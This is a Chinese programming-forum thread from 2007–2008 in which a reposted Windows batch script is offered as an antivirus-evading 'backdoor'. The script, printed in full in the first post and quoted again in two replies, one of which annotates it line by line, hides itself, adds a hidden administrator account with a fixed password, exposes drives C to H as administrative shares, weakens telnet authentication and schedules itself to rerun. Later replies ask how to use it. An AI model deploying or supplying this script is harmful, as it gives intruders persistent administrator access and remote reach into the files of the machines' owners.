编程论坛 » Windows » [转载]用批处理写的后门

WSY379 发表于 2007-9-13 22:50

[转载]用批处理写的后门

<P>代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了 ，代码如下：<BR>@echo off<BR>@attrib +s + r xyt.bat<BR>@net user xyt hacker /add<BR>@net localgroup administrators xyt /add<BR>@net share c$=c:<BR>@net share d$=d:<BR>@net share e$=e:<BR>@net share f$=f:<BR>@net share g$=g:<BR>@net share h$=h:<BR>@tlntadmn config sec = -ntlm</P>
<P>@net stop schedule<BR>@net start Schedule<BR>@echo at 11:00 c:\WINNT\SYSTEM32\log.bat &gt; c:\WINNT\SYSTEM32\xyt.bat<BR>@echo at 23:00 c:\WINNT\SYSTEM32\log.bat &gt;&gt; c:\WINNT\SYSTEM32\xyt.bat<BR>@at 11:05 c:\WINNT\SYSTEM32\xyt.bat<BR>@at 23:05 c:\WINNT\SYSTEM32\xyt.bat<BR>@net stop telnet<BR>@net start telnet<BR>@exit<BR>可惜这个批处理不能用在Windows Vista的系统上和Windows Server Edition 2003上 可惜，实在是可惜！<BR>虽然在Windows Server Edition 2003下在改一下路径是可以实现后门功能，但在Windows Vista下就用不了了，真是可惜！</P>

cnenc 发表于 2007-9-17 16:47

开telnet服务?

redice 发表于 2007-9-28 22:55

<P>@echo off<BR>@attrib +s + r xyt.bat   '将xyt.bat文件设置为 “只读＋系统”  属性<BR>@net user xyt hacker /add  <BR>@net localgroup administrators xyt /add  ‘前面两句 添加一个名字为hacker的用户 并添加到管理员组<BR>@net share c$=c:    @net share d$=d:<BR>@net share e$=e:<BR>@net share f$=f:<BR>@net share g$=g:<BR>@net share h$=h:  ’共享 c,d,e,f,g,g盘<BR>@tlntadmn config sec = -ntlm</P>
<P>@net stop schedule   <BR>@net start Schedule   ‘前两句 重启 “计划任务”服务<BR>@echo at 11:00 c:\WINNT\SYSTEM32\log.bat &gt; c:\WINNT\SYSTEM32\xyt.bat<BR>@echo at 23:00 c:\WINNT\SYSTEM32\log.bat &gt;&gt; c:\WINNT\SYSTEM32\xyt.bat<BR>@at 11:05 c:\WINNT\SYSTEM32\xyt.bat<BR>@at 23:05 c:\WINNT\SYSTEM32\xyt.bat<BR>@net stop telnet<BR>@net start telnet   ’前两句：重启telnet服务<BR>@exit</P>

lthiy 发表于 2007-9-29 12:48

看看<BR>呵呵

czjt1234 发表于 2007-9-30 06:55

<DIV class=quote><B>以下是引用<U>WSY379</U>在2007-9-13 22:50:16的发言：</B><BR>
<P>代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了 ，代码如下：<BR>@echo off<BR>@attrib +s + r xyt.bat<BR>@net user xyt hacker /add<BR>@net localgroup administrators xyt /add<BR>@net share c$=c:<BR>@net share d$=d:<BR>@net share e$=e:<BR>@net share f$=f:<BR>@net share g$=g:<BR>@net share h$=h:<BR>@tlntadmn config sec = -ntlm</P>
<P>@net stop schedule<BR>@net start Schedule<BR>@echo at 11:00 c:\WINNT\SYSTEM32\log.bat &gt; c:\WINNT\SYSTEM32\xyt.bat<BR>@echo at 23:00 c:\WINNT\SYSTEM32\log.bat &gt;&gt; c:\WINNT\SYSTEM32\xyt.bat<BR>@at 11:05 c:\WINNT\SYSTEM32\xyt.bat<BR>@at 23:05 c:\WINNT\SYSTEM32\xyt.bat<BR>@net stop telnet<BR>@net start telnet<BR>@exit<BR>可惜这个批处理不能用在Windows Vista的系统上和Windows Server Edition 2003上 可惜，实在是可惜！<BR>虽然在Windows Server Edition 2003下在改一下路径是可以实现后门功能，但在Windows Vista下就用不了了，真是可惜！</P></DIV>
<P>只有第一行要@<BR><BR>后面的每行开头的@都可以删掉</P>

guotaolovewen 发表于 2008-3-1 12:20

用什么语言编写

用什么语言编写的

absentlyh 发表于 2008-5-27 13:30

这个后门怎么用[tk09]

vfdff 发表于 2008-6-6 18:24

回复 5# czjt1234 的帖子

可以删除的意思 就是也可以保留[tk01]

cosdos 发表于 2008-6-18 01:48

[quote][bo][un]guotaolovewen[/un] 在 2008-3-1 12:20 的发言：[/bo]

用什么语言编写的 [/quote]


批处理脚本文件

命令

jxyga111 发表于 2008-6-20 08:48

你们怎么这么懂脚本啊可否教一下

查看完整版本: [转载]用批处理写的后门